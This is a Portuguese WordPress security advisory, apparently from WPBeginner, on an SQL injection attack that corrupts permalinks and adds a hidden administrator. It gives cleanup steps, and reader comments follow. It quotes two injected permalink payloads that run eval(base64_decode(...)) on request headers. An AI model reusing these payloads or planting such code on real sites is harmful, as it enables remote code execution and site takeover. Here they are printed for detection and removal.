Injeção SQL no WordPress – Último Ataque

Muitos sites estão sendo afetados por um ataque SQL recente onde códigos estão sendo injetados em seu site. Essa injeção MySQL afeta seus permalinks, tornando-os ineficazes. Como resultado, os URLs das suas postagens de blog não funcionarão. Numerosos blogs do WordPress foram alvos neste ataque. Graças a Andy Soward por trazer isso à nossa atenção.

Um dos seguintes códigos foi adicionado à sua estrutura de permalink devido a este ataque:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Essas aspas foram anexadas a todos os permalinks do seu site e só podem ser alteradas se removidas manualmente.

Para corrigir isso, vá para:

Configurações > Permalinks e remova o código acima e substitua seu código padrão.

A próxima coisa que você precisa fazer é ir para Usuários. Você verá que há mais de um administrador. Você não verá o nome deles listado, mas verá a contagem aumentada. Então, o que você precisa fazer é olhar todos os usuários e encontrar o último que se registrou. Coloque o mouse sobre esse usuário e obtenha o link. Altere o código userid= adicionando 1 a esse número. Então, se o último usuário que você pode ver era o usuário nº 2, adicione 1 a ele e faça 3. Você deve encontrar o administrador oculto com um código estranho como primeiro nome. Exclua o código e torne-o um assinante. Em seguida, retorne e exclua-o.

Isso deve corrigir o problema. Você também pode excluí-lo simplesmente acessando seu PHPMyAdmin. Porque você verá o usuário lá.

Nós apenas queríamos divulgar esta notícia o mais rápido possível, para que nossos usuários possam ser atualizados. Por favor, certifique-se de que seu blog não está infectado. Esperamos que o WordPress lance uma atualização em breve.

Além disso, se você ainda não implementou algumas dessas medidas para proteger sua Área de Administração do WordPress.

Aviso: Nosso conteúdo é apoiado pelos leitores. Isso significa que, se você clicar em alguns de nossos links, poderemos ganhar uma comissão. Veja como o WPBeginner é financiado, por que isso importa e como você pode nos apoiar. Aqui está nosso processo editorial.

O Kit de Ferramentas Definitivo para WordPress

Obtenha acesso GRATUITO ao nosso kit de ferramentas - uma coleção de produtos e recursos relacionados ao WordPress que todo profissional deve ter!

Interações do Leitor

8 CommentsLeave a Reply

  1. O banco de dados do meu site foi injetado há alguns dias, adicionando alguns caracteres e palavras estranhas após cada URL de postagem ou página. Não consegui encontrar nada estranho nas configurações: permalinks ou no menu de usuários. O que fazer para resolver este problema, por favor? Minha empresa de hospedagem tem um backup do banco de dados infectado também!

  2. fui atingido por isso duas vezes.

    da primeira vez foi injeção de sql do plugin wassup, desta vez não tenho certeza. meu provedor de hospedagem me bloqueou.

    assim que restaurarem minha conta, vou remover o wordpress.. Chega!

    • Agradecemos muito este comentário, o problema não era com o WP Super Cache, acreditamos que era o plugin chamado WP External Link. Desinstalamos e reinstalamos o WP-Super Cache duas vezes, mas depois comparamos o servidor de desenvolvimento onde tudo funcionava bem. A diferença era este plugin. Quando removemos esse plugin, funcionou. Você pode ler essa postagem agora.

      Admin

      • Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Ah, estou lendo!
        Muito obrigado!

Deixar uma resposta

Obrigado por escolher deixar um comentário. Por favor, tenha em mente que todos os comentários são moderados de acordo com nossa política de comentários, e seu endereço de e-mail NÃO será publicado. Por favor, NÃO use palavras-chave no campo do nome. Vamos ter uma conversa pessoal e significativa.